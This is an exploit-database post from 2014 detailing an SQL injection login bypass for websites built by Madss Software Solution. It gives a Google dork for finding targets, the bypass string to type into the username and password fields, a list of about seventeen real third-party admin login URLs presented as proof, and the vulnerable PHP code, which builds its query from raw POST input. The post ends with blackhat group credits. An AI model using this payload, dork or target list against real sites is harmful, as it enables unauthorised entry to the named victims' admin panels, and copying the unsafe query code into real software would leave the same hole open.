Madss Software Solution SQL Injection



EKU-ID: 3971 CVE: OSVDB-ID:
Author: Ashiyane Digital Security Team Published: 2014-04-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#########################################
# Exploit Title : Developed by Madss Software Solution  Login page Bypass Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://madsssoftwaresolution.com
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd."
#
# Date: 2014/4/13
#
###########################################
#
# Exploit : Login page bypass
#
# Location : [Target]/admin/login.php
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://www.artistmahendradubey.com/admin/login.php
#
# http://www.sardarenterprises.com/admin/login.php
#
# http://www.amritaorganic.com/admin/login.php
#
# http://www.kvmcpandhana.com/admin/login.php
#
# http://www.vikatsoft.com/admin/login.php
#
# http://www.narulamathsmagic.com/admin/login.php
#
# http://www.dayodayathirthborgaon.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.mnlawcollegekhandwa.com/admin/login.php
#
# http://www.guptashrikhandwa.com/admin/login.php
#
# http://www.apnagwalior.com/admin/login.php
#
# http://www.apnamorena.com/admin/login.php
# 
# http://www.djpsbhikangaon.com/admin/login.php
#
# http://www.acmecoachingbhikangaon.com/admin/login.php
#
# http://www.sainisportsacademy.com/admin/login.php
#
# http://www.apnaburhanpur.com/admin/login.php
#
############################################

Vulnerable Code

<?php
session_start();
error_reporting(0);
include("config.php");

/*if(isset($_SESSION["session_nickname"]) && $_SESSION["session_nickname"]!="")
{
	header("location:admin_home.php");
}*/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin Login</title>
<link href="css/login.css" rel="stylesheet" type="text/css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
<body>
<br />

<a href="../xlexcicalx.php" style="margin-left:850px; color:#F00">Logout completelly</a>
	<div id="logincontainer">
    	<h1>Administrator</h1>
        <div id="loginbox">
		<?php
		if(isset($_POST['submit']))
{
	$sql=mysql_query("select * from tbl_admin where username='".$_POST['username']."' and password='".$_POST['password']."' and type='admin'") or die(mysql_error());
	
	if(mysql_num_rows($sql)>0)
	{
		$_SESSION["session_nickname"]=$_POST['username'];
		$_SESSION["type"]='admin';
		?>
     
		<script type="text/javascript"> window.location.href="admin_home.php";</script>
    <?php   
	}
	else
	{
		$mass="Invalid user name or password. ";
}

		?>
	<tr>
	<td colspan="3" align="center"><strong style="color:#FF0000"><?php echo $mass; 	?></strong></td>
	</tr>
	<?php
	}
	?>
        	<form  method="post" />
                <div class="inputcontainer">
                    <img src="./images/icons/icon_username.png" alt="Username" />
                    <label for="username">Username:</label>
                    <input type="text" id="username" name="username" />
                </div>
                <div class="inputcontainer">
                    <img src="./images/icons/icon_locked.png" alt="Password" />
                    <label for="password">Password:</label>
                    <input type="password" id="password" name="password" />
                </div>
                <input type="submit" name="submit" value="Login" class="loginsubmit" />
                <p><a href="forget_password.php">Forgotten password</a></p>
            </form>
        </div>
    </div>
</body>
</html> 

###################################################

Milad Hacking

We Love Mohammad

Home Page : https://www.facebook.com/milad.hacking.5
Email: milad.hacking.blackhat[at]gmail.com

Parcham balast 

############################################
Special Tnx To 

My Love , Iliya Norton , Unfix Blackhat , HashoR , Unline , mahdi.safavi , h00man_empire
Bahman Spy , Far Yar , Parsix , Matthew Farrell , ALi Sec , Ali Svr  , Hossein Ghayoumi Zadeh  , Shahram BlackHat , Saeed Nouri Massal , Hamid Reza Ashrafnia , LinX64  , Hossein Hezami  , Raminramz ,Ali Reza  , Saeed.0511 , Spoofer ( best Friend ) , Dr4GOn ,Alireza666 , Amirh03in , Rezahck23 , EB051 , AbolfazlKHAAN , Hacker.Ramin ,  b0z0rgmehr , badguy , Nc 521 , Alireza Attacker , HAMIDx9 , GNU Linux , BlackhatGH , Angel--D3m0n ,   B14ckc0d3r , Milad-Bushehr , F.I.G.H.T.E.R , SHD.N3T , SaiedSoft , Cyb3r_Inj3ct0r , SolD!3r , ACC3SS , Wanted2011 , CyberHacker , Hasan Speed , iman teymouri   , Ba3bak , spoof , T3rm!nat0r5 , D3s!6n37 , @_HOJ@T_@ , 4rm4n , Th� mAnger , FaridP30 , AMoK , Azad� , The-Smith , soheil-hidd3n , blackvirus73 ,ERroR , HASSAN20 , Majidflash , R33VES� , Rz04 , stealer , Dr.James , m@rte2a , Mast3r 0mid , MMA Defacer  , MR.Moein ,  Mr.PERSIA , Red line
############################################
Never Forget  My Top Friends <3
############################################